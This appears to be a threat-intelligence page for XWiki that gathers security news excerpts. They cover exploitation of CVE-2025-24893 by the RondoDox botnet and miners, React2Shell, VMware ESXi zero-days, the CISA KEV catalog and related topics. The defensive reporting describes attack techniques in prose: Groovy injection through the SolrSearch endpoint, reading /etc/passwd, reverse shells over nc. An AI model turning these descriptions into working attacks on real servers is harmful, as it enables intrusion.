Search/xwiki
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
xwiki enterprise
Connections
42 relationships
Google: Cloud attacks exploit flaws more than weak credentials
Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days. At the same time, the use of weak credentials or misconfigurations has dropped significantly in the second half of 2025, Google notes in a report highlighting the trends on threats to cloud users. According to the report, incident responders determined that bug exploits were the primary access vector in 44.5% of the investigated intrusions, while credentials were responsible for 27% of the breaches. The most frequent vulnerability type exploited in attacks is remote code execution (RCE), the highlights being React2Shell (CVE-2025-55182) and the XWiki flaw tracked as CVE-2025-24893, leveraged in RondoDox botnet attacks. Google believes this shift in focus was likely due to increased security measures for accounts and credentials. “We assess that this change in behavior from threat actors is potentially due to Google's secure-by-default strategy and enhanced credential protections successfully closing traditional, more easily exploitable paths, raising the barrier to entry for threat actors,” Google says. The exploitation window has collapsed from weeks to a few days, as Google observed cryptominers deployed within 48 hours of vulnerability disclosure, indicating that hackers are highly ready to weaponize new flaws and incorporate them into their attack flows. Both state-sponsored actors and financially-motivated hackers mostly leveraged compromised identities, via phishing and vishing impersonating IT help desk staff, to obtain access to a target organization's cloud platform. In most of the investigated attacks, the actor's objective was silent exfiltration of high volumes of data without immediate extortion and long-term persistence. Google highlights some espionage campaigns from actors linked to Iran and China, who maintained access to the victim environment well over a year and a half. For more than two years, Iran-linked threat actor UNC1549 had access to a target environment using stolen VPN credentials and the MiniBike malware. This allowed the hackers to steal from the victim nearly one terabyte of proprietary data. In another example, the China-sponsored actor UNC5221 used the BrickStorm malware to keep access to a victim's VMware vCenter servers for at least 18 months and steal source code. North Korean hackers stealing millions Google attributes 3% of the intrusions analyzed in the second half of 2025 to North Korean IT workers (UNC5267) using fraudulent identities to obtain a job and generate revenue for the government. Another North Korean threat actor tracked as UNC4899 compromised cloud environments specifically to steal digital assets. In one case, UNC4899 stole millions of U.S. dollars in cryptocurrency after tricking a developer into downloading a malicious archive under the pretext of an open-source project collaboration. The developer then used the Airdrop service to transfer the file from the personal computer to the corporate workstation and open it in an AI-assisted integrated development environment (IDE). Inside the archive was malicious Python code that deployed a binary posing as a Kubernetes command-line tool. In the next stages, UNC4899 pivoted to the cloud environment and carried out reconnaissance activities, which included exploring specific pods in the Kubernetes cluster, established persistence, and "obtained a token for a high-privileged CI/CD service account." This allowed them to move laterally to more sensitive systems, such as a pod responsible for enforcing network policies that allowed them to break out of the container and plant a backdoor. After additional reconnaissance, UNC4899 moved to a system that handled customer information (identities, account security, cryptocurrency wallet data) and hosted database credentials stored insecurely. This data was enough for the threat actor to compromise user accounts and steal several million dollars in cryptocurrency. OpenID Connect Abuse In an attack leveraging a compromised npm package name called QuietVault, the attacker stole a developer's GitHub token and used it to create a new admin account in the cloud environment by abusing the GitHub-to-AWS OpenID Connect (OIDC) trust. In just three days from the initial compromise, QuietVault obtained the developer's GitHub and NPM API keys by leveraging AI prompts with local AI command-line interface tools, abused the CI/CD pipeline to get the organization's AWS API keys, stole data from the S3 storage, and then destroyed it in production and cloud environments. The incident was part of the "s1ngularity" supply-chain attack in August 2025, when an attacker published compromised npm packages of the Nx open-source build system and monorepo management tool. During the attack, sensitive info (GitHub tokens, SSH keys, configuration files, npm tokens) from 2,180 accounts and 7,200 repositories were exposed after the threat actor leaked them in public GitHub repositories that included the name "s1ngularity." Malicious insiders like cloud services Although email and portable storage devices were primarily used for data exfiltration, the researchers noticed that insiders are increasingly using Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Google Drive, Apple iCloud, Dropbox, and Microsoft OneDrive. The conclusion comes after an analysis of 1,002 insider data theft incidents, which revealed that 771 of them occurred while the insider was still employed and 255 occurred after their employment was terminated. Google says that the threat is significant enough for companies to implement data protection mechanisms against both internal and external threats. An employee, contractor, or consultant may sometimes violate trust and end up stealing corporate data. The tech giant says that trend analysis indicates that cloud services will soon replace email as the preferred method to exfiltrate information. The researchers report that, in a growing number of cases, attackers delete backups, remove log files, and wipe forensic artifacts to make the recovery of evidence and data harder. Google underscores that cloud attack speeds are now too fast for manual response schemes, sometimes resulting in payload deployment within one hour of a new instance's creation, making the implementation of automated incident response urgent. For the trends that could shape cloud security this year, Google expects threat activity to increase, as geopolitical conflicts, the FIFA World Cup, and U.S. midterm elections will act as magnets for malicious operations. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMar 9, 2026extracted
New Paper and Tool Help Security Teams Move Beyond Blind Reliance on CISA’s KEV Catalog
The KEV list is useful but largely misunderstood. KEVology explains what it is, and how best to use it. CISA’s KEV Catalog, more commonly known as the KEV list, emerged with the issue of BOD 22-01 in November 2021. This catalog, currently a list of just over 1,500 vulnerabilities known to have been exploited in the wild, suggests a high value prioritization source for vulnerability remediation within industry. It can be, but is not automatically so. It has two limitations: range and detail. The cybersecurity of business is not the function of CISA. CISA’s remit is to raise the security of FECB agencies, and KEV is a notification to FECB agencies of those vulnerabilities that are both urgent (already being exploited) and fixable (basically, have a vendor patch). Curating a list that contains these necessities requires a strict set of conditions which will inevitably exclude more vulnerabilities than it includes. This is the range limitation. The second limitation is that each KEV entry is sparse on detail, making it difficult to prioritize the order in which to remediate. Tod Beardsley, currently VP of Security Research at runZero (and formerly CISA KEV section chief) has written a paper simply titled ‘KEVology’. It is designed to help security teams understand KEV, and how best to use it. Beardsley explained CISA’s KEV and his KEVology paper to SecurityWeek. “To be included in the KEV,” he said, “a vulnerability must have the four qualities defined in BOD 22-01. Firstly, it must have a CVE number – so a super fresh zero-day will not make it into KEV.” End-of-life operating systems similarly miss out. Companies still use them, but nobody produces a CVE for them. “They can just be quietly accumulating vulnerabilities that no one knows or cares about,” he added, “except the state actors who make it their job to know about them. Such vulnerabilities are favored by intelligence operators who have the bandwidth to research old operating systems – but none of that will ever hit the KEV.” Even if it is known to be exploited. The second requirement, he continued, is “It must have been exploited – so a vulnerability that has been known for ten years, but for which CISA has no knowledge of exploitation, will not make the cut.” The important point here is not actually whether it has been exploited, but whether CISA is aware of it being exploited. The third, he continued, is the availability of a patch. “Let’s say the vendor says, ‘Nope, that’s not a bug, it’s a feature,’ and declines to patch it. Meanwhile, Metasploit and/or Nuclei publish exploits that get used in the wild. That exploited vulnerability still won’t be included because there’s no vendor patch.” The fourth, he continued, is “It must be relevant to US federal Interests.” There are numerous game issues that can provide adversarial bridges to the wider business environment. “But they will never make the KEV, because the federal government doesn’t care about games.” In 2022, hackers used an RCE exploit via Dark Souls that forced Bandai Namco to shut down its network. Conversely, there are entries that will have little interest for the wider business environment. For example, CVE-2021-44207 is included, but, said Beardsley, “Unless you are a state-employed veterinary care provider, you probably don’t need to worry too much about it.” Interestingly, while not referencing end of life operating systems, the latest BOD from CISA (26-02, issued on February 5, 2026) requires FCEB agencies to decommission and replace ‘End-of-Support Edge Devices’. In at least one sense, this could be considered as widening the scope of the Catalog since the requirement affects all end-of-support edge vulnerabilities, whether or not there is a vulnerability that has been exploited and whether or not a patch exists. Perhaps the biggest problem with the KEV is that hard-pressed business security teams understandably focus on it without necessarily understanding its limitations. “This is the hitlist that I must remediate because the government has said so.” Beardsley wrote in the paper, without detracting from its value and importance, “That’s not its purpose.” Its purpose is to signal to FECB agencies what needs to be patched. His paper expands this signal to be relevant to the wider cybersecurity industry. “KEVology examines the KEV as an operational signal with the goal of helping cybersecurity practitioners make defensible prioritization decisions under real-world constraints.” To assist in this prioritization, the paper evaluates “A range of commonly used enrichment signals, including CVSS, EPSS, SSVC, as well as less-common signals such as public exploit tooling, MITRE ATT&CK mappings, and time-sequenced relationships, emphasizing that no single metric is sufficient on its own. Rather, value emerges from combining diverse, imperfect signals to reason about uncertainty, effort, and urgency as the KEV continues to grow in size, scope, and technological diversity.” The attraction for security teams is obvious: it is far easier to remediate the 1,500 KEV entries and new ones as they arrive, than try to tackle the full list of more than 300,000 CVEs. What the KEVology paper seeks to provide is an enrichment methodology to ease and maximize use of the KEV. The paper is accompanied by the launch of Beardsley’s own KEV Collider web app, hosted on runZero, “It’s essentially an interactive form of the paper,” he explained. “You can tell the Collider, ’Today I’m only concerned about KEV vulnerabilities with these CVSS qualities. Of course, you can filter on multiple qualities – so you could filter on ‘remote’ with an EPSS (exploit prediction scoring system) score of 0.50 or more [a 50% chance that this vulnerability will be exploited somewhere in the next 30 days] and / or for which a Metasploit module or Nuclei template exists.” This provides immediate KEV data enrichment to align CISA’s recommendations with the organizations’ own security priorities, telling the security team how to prioritize, or perhaps ignore, KEV’s entries in rapid time. While the KEV Collider, born out of the KEVology paper, maximizes and streamlines the use and value of CISA’s KEV Catalog, it brings an additional benefit. Time saved on purely understanding and prioritizing CISA’s FECB remediation instructions can be released for business security teams to look at other issues – those vulnerabilities that look dangerous but will never appear within KEV. Related: Concerns Raised Over CISA’s Silent Ransomware Updates in KEV Catalog Related: CISA KEV Catalog Expanded 20% in 2025, Topping 1,480 Entries Related: CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog Related: Vulnerabilities in CISA KEV Are Not Equally Critical: Report
securityweek.comFeb 9, 2026extracted
Exploit for VMware Zero-Day Flaws Likely Built a Year Before Public Disclosure
A Chinese threat actor built an exploit for three VMware ESXi vulnerabilities that were patched in March 2025 over a year before public disclosure, cybersecurity firm Huntress reports. The three bugs, tracked as CVE-2025-22224, CVE-2025-22225 and CVE-2025-22226, and named ESXicape, allow privileged attackers to execute arbitrary code and escape the VM to compromise the hypervisor itself. VMware owner Broadcom warned last year that the three flaws had been exploited in the wild as zero-days, but did not share information on the attacks. Now, Huntress says a threat actor has attempted to exploit the VMware ESXi vulnerabilities in December 2025, in an attack likely involving ransomware. Initial access to the targeted environment, Huntress says, was obtained through a compromised SonicWall VPN instance. The hackers then abused a Domain Admin (DA) account to access the primary domain controller and then deployed the ESXi exploit toolkit. As part of the attack, the hackers modified the Windows firewall to block the victim’s access to external networks, harvested data for exfiltration, and then executed the exploit, which escapes the VM and deploys a backdoor on the ESXi hypervisor. Analysis of the VMware exploit, Huntress says, suggests it was developed by a well-resourced threat actor likely operating in a Chinese-speaking region. The toolkit “was potentially built as a zero-day exploit over a year before VMware’s public disclosure,” the cybersecurity firm says. Based on timestamps in the exploit’s binaries, Huntress believes that the exploit might be dated February 2024. A VSOCK communication tool used in the attack was likely created in November 2023. “This exploit toolkit supports 155 ESXi builds spanning versions 5.1 through 8.0. If you are running end-of-life versions, you are exposed with no fix available,” Huntress notes. Organizations are advised to apply patches for these VMware ESXi vulnerabilities as soon as possible. Data from The Shadowserver Foundation shows that, as of January 8, 2026, over 30,000 internet-exposed ESXi instances could be vulnerable to CVE-2025-22224. These deployments might be affected by other bugs as well. Related: CISA Adds Exploited XWiki, VMware Flaws to KEV Catalog Related: Broadcom Fails to Disclose Zero-Day Exploitation of VMware Vulnerability Related: VMware Flaws That Earned Hackers $340,000 at Pwn2Own Patched Related: NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch
securityweek.comJan 9, 2026extracted
CryptPad e paradigma zero-knowledge: binomio vincente per la sicurezza dei dati aziendali
Per un Ciso (Chief Information Security Officer), la figura che deve definire le strategie corrette per proteggere al meglio gli asset aziendali e mitigare i rischi cyber, ogni documento condiviso su una piattaforma cloud rappresenta una complessa equazione di rischio. Per questo motivo, l’adozione di una suite collaborativa e di produttività open source come CryptPad permette di sposare appieno il principio Zero-Knowledge, assicurando che il fornitore del servizio non potrà avere alcuna possibilità tecnica di accedere ai dati degli utenti in chiaro. Indice degli argomenti L’intero patrimonio informativo aziendale, i piani strategici di M&A (merger and acquisition), i dati sensibili del personale, i contratti con i fornitori, la proprietà intellettuale e il codice sorgente, risiede sempre più spesso su infrastrutture SaaS (Software as a Service) come Google Workspace e Microsoft 365. Se da un lato queste soluzioni hanno abilitato un’efficienza operativa e una collaborazione senza precedenti, dall’altro hanno introdotto una vulnerabilità sistemica. Un’esposizione al rischio che è diventata una delle principali preoccupazioni a livello di board: la centralizzazione dei dati più critici su piattaforme di terze parti, la cui sicurezza si basa su un fragile modello di fiducia implicita. Ci fidiamo che i loro amministratori, umani e non, non accedano ai nostri file. Riponiamo fiducia sul fatto che le loro complesse policy interne siano sufficienti a prevenire abusi. Ci fidiamo che i dati, pur cifrati at-rest ed in-transit, siano al sicuro da accessi governativi. Questo modello, tuttavia, mostra crepe sempre più evidenti. Per le aziende europee, al rischio tecnico si aggiunge un profondo e irrisolto conflitto normativo: da un lato il GDPR impone la massima protezione dei dati personali, con sanzioni che possono raggiungere il 4% del fatturato globale, dall’altro il Cloud Act statunitense potrebbe obbligare i provider USA a consegnare dati alle autorità americane, indipendentemente da dove questi siano conservati. Questa tensione, cristallizzata dalla sentenza Schrems II (con cui la Corte di Giustizia dell’Unione Europea, nella causa C-311/18, risalente al 16 luglio 2020, ha invalidato il Privacy Shield), rende legalmente precaria la posizione di qualsiasi azienda europea che affidi i propri asset informativi a questo modello. Si accetta un rischio residuo significativo e una perenne incertezza legale. La domanda strategica per il management non è più se questo modello di fiducia possa fallire, ma – quando e con quale impatto devastante sul business -, sulla reputazione e sulla continuità operativa. La risposta non risiede in un miglioramento incrementale di policy e controlli, ma in un cambio di paradigma architetturale: l’adozione del modello Zero-Knowledge. CryptPad è, come dicevamo, una suite collaborativa e di produttività open source, sviluppata dalla società francese XWiki SAS. La sua caratteristica distintiva non è una lunga lista di funzionalità, ma il suo fondamento architetturale, che sposa pienamente il principio Zero-Knowledge. In un sistema di questo tipo, il fornitore del servizio non ha alcuna possibilità tecnica di accedere ai dati degli utenti in chiaro. Il server archivia esclusivamente contenitori di dati cifrati, senza possedere né poter mai ottenere le relative chiavi di decifratura. Ciò sposta radicalmente il modello di sicurezza, passando da un approccio basato sulla fiducia a uno fondato sulla garanzia crittografica. Per le aziende, i vantaggi sono strategici e multilivello. Il primo e più importante è il raggiungimento di una reale sovranità sui dati. L’organizzazione mantiene il pieno e ininterrotto controllo crittografico dei propri asset, anche quando sono fisicamente ospitati su infrastrutture esterne. I dati non sono più affidati a terzi, ma semplicemente parcheggiati in un formato per essi illeggibile. L’architettura incarna il principio fondamentale di privacy by design (Art. 25 GDPR). Tale approccio semplifica enormemente la stesura delle valutazioni di impatto sulla protezione dei dati, poiché il rischio associato a un potenziale accesso illecito da parte del fornitore è nullo. In caso di data breach lato server, la notifica all’autorità garante può specificare con certezza che i contenuti dei file non sono stati esposti, limitando enormemente il danno reputazionale e legale. Infine, si mitiga in modo significativo il rischio relativo alla supply chain. L’anello debole umano del fornitore, un tecnico curioso, un amministratore scontento o un account compromesso, viene rimosso dall’equazione del rischio. L’approccio condivide la sua filosofia con il più ampio modello di sicurezza Zero Trust: non fidarsi di nessuno per impostazione predefinita e verificare sempre, in questo caso tramite la crittografia. CryptPad e il modello Zero-Knowledge Il fondamento tecnico che rende possibile il modello Zero-Knowledge è la crittografia end-to-end eseguita interamente lato client, ovvero all’interno del browser web dell’utente. Il browser diventa una sandbox sicura, dove i dati vengono resi leggibili solo per l’utente autorizzato. L’architettura di CryptPad risolve questa sfida in modo elegante. Quando si accede a un documento, l’URL è strutturato in due parti separate dal simbolo #. La prima è l’indirizzo della risorsa, mentre la seconda, nota come fragment identifier, contiene la chiave crittografica. Per standard web consolidati, questa seconda porzione dell’URL non viene mai trasmessa al server. Il processo è intrinsecamente sicuro: il browser richiede l’applicazione al server usando solo la prima parte dell’URL; il server invia il codice dell’applicazione (JavaScript, HTML); una volta caricata, l’applicazione, eseguita localmente, legge la chiave dal fragment e la usa per decifrare i dati che riceve dal server in formato cifrato. Ogni modifica viene cifrata istantaneamente con algoritmi standard come AES-256 prima di essere inviata al server. A rafforzare questo modello di fiducia verificabile c’è il fatto che CryptPad è interamente open source. Ciò va oltre la semplice trasparenza: permette un audit pubblico e continuo da parte della comunità di sicurezza globale. Il codice può essere esaminato da ricercatori, aziende di sicurezza e clienti stessi, in netto contrasto con il modello tipico del software proprietario. Per comprendere appieno il valore di CryptPad, è essenziale un confronto diretto con le piattaforme tradizionali. Il modello di sicurezza delle suite tradizionali è basato sulla fiducia. Beneficiano di investimenti colossali in sicurezza, ma essa è orientata a difendere la propria infrastruttura globale. La protezione della riservatezza dei dati del cliente dal provider stesso non è garantita per design. Il controllo sui dati è quindi delegato: l’azienda cliente non ha mai una sovranità crittografica completa sui propri asset, creando una compliance complessa e opaca. Il punto di forza risiede in un ecosistema di funzionalità estremamente ricco, un vantaggio pagato con una fondamentale cessione di controllo. Al contrario, il modello di CryptPad è basato sulla verifica crittografica e su un’architettura ispezionabile. La sicurezza non si fonda su una promessa, ma su un’architettura che impedisce tecnicamente al provider di accedere ai dati. Ciò garantisce la piena sovranità crittografica dell’utente sui propri dati. La giurisdizione diventa chiara e allineata al Gdpr. Il TCO di un’istanza auto-ospitata deve tenere conto dei costi di manutenzione, ma questo va visto come un investimento diretto nel controllo del proprio perimetro di sicurezza, un passaggio da Opex (Operating Expenditure riguarda le spese correnti necessarie per gestire l’attività quotidiana) a un Capex (Capital Expenditure si riferisce alle spese per l’acquisto e il mantenimento di beni duraturi) strategico sul rischio. Adottare CryptPad richiede una visione matura della sicurezza, poiché il modello Zero- Knowledge sposta la responsabilità. La priorità assoluta diventa la sicurezza dell’endpoint. L’intera catena dipende dall’integrità del dispositivo client. Un malware come un keylogger (software o hardware che, una volta registrate le sequenze di tasti premuti su una tastiera, raccoglie dati sensibili come password e credenziali, e li spedisce a terzi non autorizzati), un infostealer (l’ingranaggio di un ecosistema criminale sofisticato capace di sfruttare la sottrazione di informazioni per attacchi più grandi e devastanti) o una estensione browser malevola, potrebbe bypassare completamente il modello di sicurezza. L’adozione di questa tecnologia deve quindi essere parte di una strategia olistica che includa soluzioni EDR (strumenti di risposta, non più proattivi, ma reattivi) e una solida formazione. Parallelamente, va gestita l’adozione da parte degli utenti. La resistenza al cambiamento è un fattore reale. Un’implementazione di successo richiede una chiara comunicazione dei benefici strategici e un’introduzione graduale, partendo da team che trattano dati ad altissima sensibilità (Legal, Finance, R&S) per creare casi di successo interni. Infine, l’opzione self-hosting, pur offrendo il massimo controllo, introduce l’onere della manutenzione e della messa in sicurezza dell’infrastruttura. Anche la risposta agli incidenti cambia radicalmente: la compromissione del server non espone il contenuto dei file, ma l’analisi forense si sposta sul client, richiedendo competenze specifiche per investigare su endpoint potenzialmente compromessi. CryptPad non va visto come un sostituto 1-a-1 di suite aziendali mature, ma come un asset chirurgico e strategico da impiegare dove il rischio è più alto e la riservatezza è un requisito non negoziabile. L’ascesa di architetture Zero-Knowledge non è un fenomeno di nicchia, ma una risposta matura e necessaria alla crescente complessità del panorama normativo e delle minacce cyber. Adottare soluzioni di questo tipo significa passare da una sicurezza basata sulla fiducia a una fondata sulla garanzia crittografica. È una decisione che rafforza la postura di sicurezza, semplifica la compliance e afferma la sovranità sui dati aziendali. In un periodo in cui la fiducia è un bene sempre più scarso e la privacy un valore sempre più richiesto dai clienti, trasformare la protezione dei dati da un onere di compliance a un tangibile valore di brand non è solo una scelta saggia, ma un vero e proprio, fondamentale, vantaggio competitivo.
cybersecurity360.itJan 7, 2026extracted
RondoDox botnet exploits React2Shell flaw to breach Next.js servers
The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers. First documented by Fortinet in July 2025, RondoDox is a large-scale botnet that targets multiple n-day flaws in global attacks. In November, VulnCheck spotted new RondoDox variants that featured exploits for CVE-2025-24893, a critical remote code execution (RCE) vulnerability in the XWiki Platform. A new report from cybersecurity company CloudSEK notes that RondoDox started scanning for vulnerable Next.js servers on December 8 and began deploying botnet clients three days later. React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement the React Server Components (RSC) 'Flight' protocol, including Next.js. The flaw has been leveraged by several threat actors to breach multiple organizations. North Korean hackers exploited React2Shell to deploy a new malware family named EtherRAT. As of December 30, the Shadowserver Foundation reports detecting over 94,000 internet-exposed assets vulnerable to React2Shell. CloudSEK says that RondoDox has passed through three distinct operational phases this year: Reconnaissance and vulnerability testing from March to April 2025 Automated web app exploitation from April to June 2025 Large-scale IoT botnet deployment from July to today Regarding React2Shell, the researchers report that RondoDox has focused its exploitation around the flaw significantly lately, launching over 40 exploit attempts within six days in December. During this operational phase, the botnet conducts hourly IoT exploitation waves targeting Linksys, Wavlink, and other consumer and enterprise routers to enroll new bots. After probing potentially vulnerable servers, CloudSEK says that RoundDox started to deploy payloads that included a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a variant of Mirai (/nuts/x86). The ‘bolts’ component removes competing botnet malware from the host, enforces persistence via /etc/crontab, and kills non-whitelisted processes every 45 seconds, the researchers say. CloudSEK provides a set of recommendations for companies to protect against this RondoDox activity, among them auditing and patching Next.js Server Actions, isolating IoT devices into dedicated virtual LANs, and monitoring for suspicious processes being executed. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comDec 31, 2025extracted
$29 Million Worth of Bitcoin Seized in Cryptomixer Takedown
The cryptocurrency mixer Cryptomixer has been shut down by law enforcement agencies in Europe for facilitating cybercrime and money laundering, Europol announced on Monday. Accessible both from the clear and the dark web, Cryptomixer was a mixing service (tumbler) designed to help customers obscure the trail of their cryptocurrency by combining their deposits with those from other users into a large, pooled fund before sending back an equivalent amount of untraceable coins to a wallet specified by the customer. While such services can have legitimate use cases (for example, to protect an individual’s financial privacy), they are in many cases used to launder funds obtained from illegal activities. According to Europol, Cryptomixer was used to mix €1.3 billion ($1.5 billion) worth of Bitcoin since its creation nearly a decade ago. The law enforcement agency said the service was often used to launder proceeds from ransomware attacks, credit card fraud, and weapons and drugs trafficking. The service has been targeted as part of Operation Olympia, an operation conducted by law enforcement agencies in Germany and Switzerland, with support from Europol and Eurojust. As part of the operation, investigators seized three servers in Switzerland, Cryptomixer’s surface web domain, and more than 12 Tb of data, along with roughly €25 million ($29 million) worth of Bitcoin. Europol has not mentioned any arrests as part of Operation Olympia. Cryptocurrency mixers are often targeted by law enforcement. The United States Justice Department announced earlier this year that it had charged three Russian nationals accused of operating the Blender and Sinbad mixers. Related: MITRE Unveils AADAPT Framework to Tackle Cryptocurrency Threats Related: US Lifts Sanctions Against Crypto Mixer Tornado Cash Related: US Sanctions North Korean Bankers Accused of Laundering Stolen Cryptocurrency Related: XWiki Vulnerability Exploited in Cryptocurrency Mining Operation
securityweek.comDec 1, 2025extracted
Fortinet Discloses Second Exploited FortiWeb Zero-Day in a Week
Fortinet on Tuesday announced patches for 17 vulnerabilities, including a zero-day resolved with the latest FortiWeb updates. Tracked as CVE-2025-58034 (CVSS score of 6.7), the bug is described as an OS command injection issue that can be exploited by authenticated attackers to execute arbitrary code on the underlying system, via crafted HTTP requests or CLI commands. “Fortinet has observed this to be exploited in the wild,” the vendor notes in its advisory, without providing details on the attacks. This is the second FortiWeb zero-day publicly disclosed within a week, after the company confirmed on November 14 that CVE-2025-64446 (CVSS score of 9.1), a critical-severity path traversal issue, had been targeted in attacks. Fortinet patched both exploited vulnerabilities in FortiWeb versions 8.0.2, 7.6.6, 7.4.11, 7.2.12, and 7.0.12. Users should update their deployments as soon as possible. Simultaneously with Fortinet’s advisory on the second zero-day, the US cybersecurity agency CISA added the security defect to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to patch it within a week. The short patching window granted by CISA underlines the importance of exploited FortiWeb bugs. Per Binding Operational Directive (BOD) 22-01, federal agencies typically have three weeks to resolve flaws newly added to KEV. Of the remaining 16 vulnerabilities Fortinet disclosed on Tuesday, three are high-severity flaws in FortiClient Windows (CVE-2025-47761 and CVE-2025-46373) and FortiVoice (CVE-2025-58692) that could lead to the execution of arbitrary code or commands. The company also addressed medium- and low-severity bugs in FortiExtender, FortiMail, FortiPAM, FortiSandbox, FortiClientWindows, FortiADC, FortiOS, FortiSwitchManager, FortiProxy, and FortiWeb. Aside from CVE-2025-58034, Fortinet makes no mention of any of these security defects being exploited in the wild. Additional information can be found on the company’s security advisories page. Related: Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability Related: Chrome 142 Update Patches Exploited Zero-Day Related: Widespread Exploitation of XWiki Vulnerability Observed Related: Critical WatchGuard Firebox Vulnerability Exploited in Attacks
securityweek.comNov 19, 2025extracted
RondoDox botnet malware now hacks servers using XWiki flaw
The RondoDox botnet malware is now exploiting a critical remote code execution (RCE) flaw in XWiki Platform tracked as CVE-2025-24893. On October 30, the U.S. Cybersecurity and Information Security Agency (CISA) marked the flaw as actively exploited. Now, a report from vulnerability intelligence company VulnCheck notes that CVE-2025-24893 is being leveraged in attacks by multiple threat actors, including botnet operators like RondoDox and cryptocurrency miners. RondoDox is a large-scale botnet malware first documented by Fortinet in July 2025 as an emerging threat. In early October, Trend Micro warned about RondoDox’s exponential growth, with recent variants targeting at least 30 devices via 56 known vulnerabilities, some of them disclosed at Pwn2Own hacking competitions. Starting November 3, VulnCheck observed RondoDox exploiting CVE-2025-24893 through a specially crafted HTTP GET request that injected base64-encoded Groovy code through the XWiki SolrSearch endpoint, causing the server to download and execute a remote shell payload. The downloaded script (rondo. .sh) is a first-stage downloader that retrieves and executes the main RondoDox payload. The researchers observed additional attacks involving cryptocurrency miner deployments on November 7, and also attempts to establish a bash reverse shell occurred on October 31 and November 11. VulnCheck has also recorded widespread scanning using Nuclei, sending payloads that attempt to execute cat /etc/passwd via Groovy injection in the XWiki SolrSearch endpoint, as well as OAST-based probing. The XWiki Platform is a Java-based, open-source enterprise wiki platform used primarily for self-hosted internal knowledge management solutions. CVE-2025-24893 impacts versions before 15.10.11 and 16.4.1, which are the upgrade targets for administrators. Given the active exploitation status for this flaw, immediate patching is advised. According to the researchers, multiple attackers started to leverage the vulnerability just days after initial exploitation started. They note that the incidents they observed come from a user-agent and documented payload servers associated with RondoDox. This means that publicly available indicators of compromise (IoCs) for the botnet should block these exploitation attempts. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comNov 17, 2025extracted
Widespread Exploitation of XWiki Vulnerability Observed
Threat actors started exploiting a critical XWiki vulnerability en masse within two weeks of the bug being reported as exploited in the wild, VulnCheck warns. Tracked as CVE-2025-24893 (CVSS score of 9.8), the flaw was discovered in May 2024 and patched in June 2024, but a CVE identifier was assigned to it only in early 2025, after technical information became public. The bug exists because, in XWiki versions before 15.10.11, 16.4.1 and 16.5.0RC1, user-supplied input to a search function is improperly sanitized, allowing remote, unauthenticated attackers to execute arbitrary code via crafted requests to the search endpoint. Proof-of-concept (PoC) code targeting the issue has been publicly available since early 2025, and security researchers observed the defect being targeted in reconnaissance attempts, but in-the-wild exploitation started only last month. In late October, VulnCheck warned that a threat actor was exploiting CVE-2025-24893 as part of a cryptocurrency mining operation, and the US cybersecurity agency CISA added the bug to its Known Exploited Vulnerabilities (KEV) catalog two days later. Now, VulnCheck says the activity targeting vulnerable XWiki servers has expanded significantly, with multiple threat actors exploiting the bug in their attacks. The RondoDox botnet has added an exploit for the CVE to its toolset and, starting November 3, it has increasingly targeted the flaw in attacks. Since November 7, the flaw has been exploited in a second crypto-mining operation, while the threat actor behind the first mining operation expanded its activity with two new payload hosting servers and a new server hosting the exploit. VulnCheck also observed attacks in which an IP address associated with AWS, with no history of abuse, was used “to establish a reverse shell back to itself using the BusyBox nc binary”, likely as part of a targeted attack. Other threat actors also attempted to establish web shells on vulnerable XWiki servers. One of the attacks originated from an IP that “exposes both QNAP and DrayTek interfaces to the internet”, likely because it is a compromised host, and attempted to deploy a bash reverse shell. Additionally, VulnCheck has observed numerous threat actors simply performing scans and probes of vulnerable servers, including some using Nuclei templates. “Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale,” VulnCheck notes. Related: Fortinet Confirms Active Exploitation of Critical FortiWeb Vulnerability Related: Chrome Zero-Day Exploitation Linked to Hacking Team Spyware Related: Exploitation of Critical Adobe Commerce Flaw Puts Many eCommerce Sites at Risk Related: CISA Confirms Exploitation of Latest Oracle EBS Vulnerability
securityweek.comNov 17, 2025extracted
RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its Botnet
The botnet malware known as RondoDox has been observed targeting unpatched XWiki instances against a critical security flaw that could allow attackers to achieve arbitrary code execution. The vulnerability in question is CVE-2025-24893 (CVSS score: 9.8), an eval injection bug that could allow any guest user to perform arbitrary remote code execution through a request to the "/bin/get/Main/SolrSearch" endpoint. It was patched by the maintainers in XWiki 15.10.11, 16.4.1, and 16.5.0RC1 in late February 2025. While there was evidence that the shortcoming had been exploited in the wild since at least March, it wasn't until late October, when VulnCheck disclosed it had observed fresh attempts weaponizing the flaw as part of a two-stage attack chain to deploy a cryptocurrency miner. Subsequently, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply necessary mitigations by November 20. In a fresh report published Friday, VulnCheck revealed that it has since observed a spike in exploitation attempts, hitting a new high on November 7, followed by another surge on November 11. This indicates broader scanning activity likely driven by multiple threat actors participating in the effort. This includes RondoDox, a botnet that's rapidly adding new exploitation vectors to rope susceptible devices into a botnet for conducting distributed denial-of-service (DDoS) attacks using HTTP, UDP, and TCP protocols. The first RondoDox exploit was observed on November 3, 2025, per the cybersecurity company. Other attacks have been observed exploiting the flaw to deliver cryptocurrency miners, as well as attempts to establish a reverse shell and general probing activity using a Nuclei template for CVE-2025-24893. The findings once again illustrate the need for adopting robust patch management 